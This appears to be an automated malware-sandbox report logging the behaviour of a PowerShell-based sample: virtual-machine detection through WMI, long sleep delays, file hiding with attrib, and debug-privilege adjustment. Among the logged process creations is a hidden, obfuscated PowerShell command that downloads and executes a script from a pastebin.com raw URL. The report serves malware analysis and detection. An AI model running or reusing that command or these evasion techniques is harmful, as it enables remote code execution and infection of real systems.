Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3754Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6124Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 983Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 877Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4669Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5039Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 944
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 486
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6407
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3359
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852Thread sleep time: -14757395258967632s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7260Thread sleep count: 983 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7324Thread sleep count: 140 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7232Thread sleep count: 877 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7328Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4504Thread sleep count: 4669 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4504Thread sleep count: 5039 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6344Thread sleep time: -19369081277395017s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6176Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3644Thread sleep count: 944 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7436Thread sleep count: 143 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3720Thread sleep count: 486 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6492Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7676Thread sleep count: 6407 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2196Thread sleep time: -21213755684765971s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1252Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7676Thread sleep count: 3359 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: powershell.exe, 00000001.00000002.1781186898.000001A919A1F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}
Source: powershell.exe, 0000000C.00000002.2008223258.000001D66D5C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000007.00000002.1920002347.0000024DA79C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlld
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft OneDrive\FileSync VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
